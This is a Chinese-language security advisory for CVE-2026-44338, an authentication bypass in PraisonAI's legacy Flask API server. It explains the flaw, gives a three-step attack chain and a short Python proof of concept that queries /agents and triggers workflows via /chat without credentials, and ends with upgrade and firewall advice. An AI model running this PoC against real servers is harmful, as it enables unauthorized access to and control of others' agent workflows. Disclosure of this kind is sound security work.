CVE-2026-44338 PraisonAI 认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-44338

漏洞类型

认证绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PraisonAI

漏洞概述

PraisonAI在2.5.6至4.6.34之前的版本中，默认集成的遗留Flask API服务器未开启身份验证。远程攻击者无需任何凭证即可访问该API，利用/agents端点读取配置信息，并通过/chat端点恶意触发agents.yaml中定义的工作流，导致系统面临未授权访问和控制的风险。

技术细节

该漏洞的根本原因在于PraisonAI在特定版本范围内附带了一个遗留的Flask API服务器，且其安全配置存在严重缺陷，身份验证机制默认处于禁用状态。由于CVSS向量显示攻击无需用户交互（UI:N）且无需权限（PR:N），攻击者只需能通过网络连接到目标服务器端口即可实施攻击。利用过程主要涉及两个关键端点：首先，攻击者向'/agents'发送GET请求，可获取系统内所有已配置的代理和工作流详情；其次，攻击者向'/chat'发送POST请求，携带特定Payload即可直接调用并触发agents.yaml预定义的工作流。这使得攻击者能够绕过系统的正常访问控制逻辑，执行未授权的操作。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，发现开放的PraisonAI Flask API端口。

STEP 2

2. 未授权访问

攻击者直接访问/agents端点，无需Token即可获取代理配置和工作流信息。

STEP 3

3. 触发工作流

攻击者利用/chat端点发送恶意请求，触发agents.yaml中定义的工作流，执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://localhost:8000"

# Check if authentication is disabled by accessing /agents
agents_endpoint = f"{target_url}/agents"
chat_endpoint = f"{target_url}/chat"

try:
    # Step 1: Access /agents without headers/token
    response = requests.get(agents_endpoint, timeout=5)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: /agents is accessible without auth.")
        print(f"[+] Response: {response.text[:200]}")

        # Step 2: Trigger workflow via /chat
        payload = {"message": "test trigger"}
        exploit_response = requests.post(chat_endpoint, json=payload, timeout=5)
        if exploit_response.status_code == 200:
            print("[+] Exploit Successful: /chat triggered workflow without auth.")
        else:
            print(f"[-] /chat returned status: {exploit_response.status_code}")
    else:
        print(f"[-] Target not vulnerable or API not reachable. Status: {response.status_code}")

except Exception as e:
    print(f"Error: {e}")

影响范围

PraisonAI >= 2.5.6, < 4.6.34

防御指南

临时缓解措施

建议立即升级到PraisonAI 4.6.34版本以修复此漏洞。若暂时无法升级，请务必配置防火墙规则，将Flask API服务端口（默认非标准端口，需根据实际部署确认）仅对本地回环或受信任的内网IP开放，防止外部攻击者直接访问。